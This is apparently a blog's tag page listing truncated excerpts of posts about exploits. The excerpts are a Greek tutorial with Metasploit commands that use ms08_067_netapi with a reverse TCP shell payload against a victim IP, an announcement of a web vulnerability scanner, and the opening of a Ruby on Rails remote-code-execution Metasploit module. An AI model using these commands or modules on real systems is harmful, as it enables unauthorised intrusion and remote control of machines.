Μετάβαση στο κύριο περιεχόμενο

Αναρτήσεις

Εμφάνιση αναρτήσεων με την ετικέτα exploit

Exploit Windows just with an excel document

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit

Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.
Ανοίγω ένα τερματικό...
Terminal: 
root@bt:msfconsole <- font="">
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <- font="">

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack

Συνχίζουμε γράφοντας τις παρακάτω εντολές...msf > use windows/smb/ms08_067_netapi <- span="">
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <- ip="" span="" victim="">
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="&qu…

ParanoicScan

Vulnerability Scanner

As the first program of 2014 I bring you the new version of my ParanoicScan in its version 1.7, while some people stole the source code of the previous version of this program code, the issue is that not bother me that you used the code but only changed him the program name and the name of the author did not bother to change the names of the variables only changed the name of the author, for a moment hesitate to continue to share the code of this 2-year project working but despite that I continue to share the code of this program, besides explorer (of perlenespanol) recommended me to do another version of this program was to demonstrate that the real author so that the program has the dual function and arrange countless bugs that were in all the code.


[++] Old Options


Google & Bing Scanner that also scan :

XSS

SQL GET / POST

SQL GET

SQL GET + Admin

Directory listing

MSSQL

Jet Database

Oracle

LFI

RFI

Full Source Discloure

HTTP Information

SQLi Scanner

Bypass…

Ruby on Rails Dynamic Render File Upload Remote Code Execution

This Metasploit module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This Metasploit module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths. Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This Metasploit module does not use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.
MD5 | 330df82eae0981c2ca7cc8777a63a53c


require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpCli…